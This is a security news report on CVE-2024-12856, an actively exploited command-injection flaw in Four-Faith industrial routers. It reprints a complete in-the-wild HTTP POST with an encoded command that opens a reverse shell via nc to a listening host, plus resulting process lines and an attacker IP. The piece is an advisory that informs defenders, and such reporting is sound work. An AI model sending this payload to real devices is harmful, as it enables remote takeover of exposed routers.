A significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.
Assigned as CVE-2024-12856, this flaw allows attackers to execute unauthenticated remote command injections by leveraging the routers’ default credentials.
The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.
It involves leveraging the /apply.cgi endpoint over HTTP by exploiting the adj_time_year parameter during system time modifications using the submit_type=adjust_sys_time action.
2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide
Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
Once injected, the attacker can execute commands. The running process on the vulnerable device may look like this:
20938 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20943 admin 1636 S /bin/sh -i
20945 admin 1636 S nc 192.168.1.206 1270
VulnCheck observed malicious activity from the IP address 178.215.238[.]91, attempting to exploit this vulnerability with a payload matching earlier patterns.
A related blog post from November 2024 also documented similar exploitation attempts, confirming this vulnerability’s active exploitation in the wild.
Organizations using Four-Faith routers are strongly encouraged to:
By addressing this vulnerability proactively, organizations can mitigate the risks posed by CVE-2024-12856.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free
SmuggleShield, a recently launched browser extension, is gaining attention in the cybersecurity space for its…
Cloud security researchers have uncovered alarming trends in identity compromises within Amazon Web Services (AWS)…
Trend Micro has addressed six high-severity vulnerabilities in its Apex One and Apex One as a Service product, which…
A 20-year-old U.S. Army soldier, Cameron John Wagenius, has been arrested and indicted by federal…
D-Link warned users of several legacy router models about known vulnerabilities actively exploited by botnets.…
The DrayTek Gateway devices, more specifically the Vigor2960 and Vigor300B models, are susceptible to a…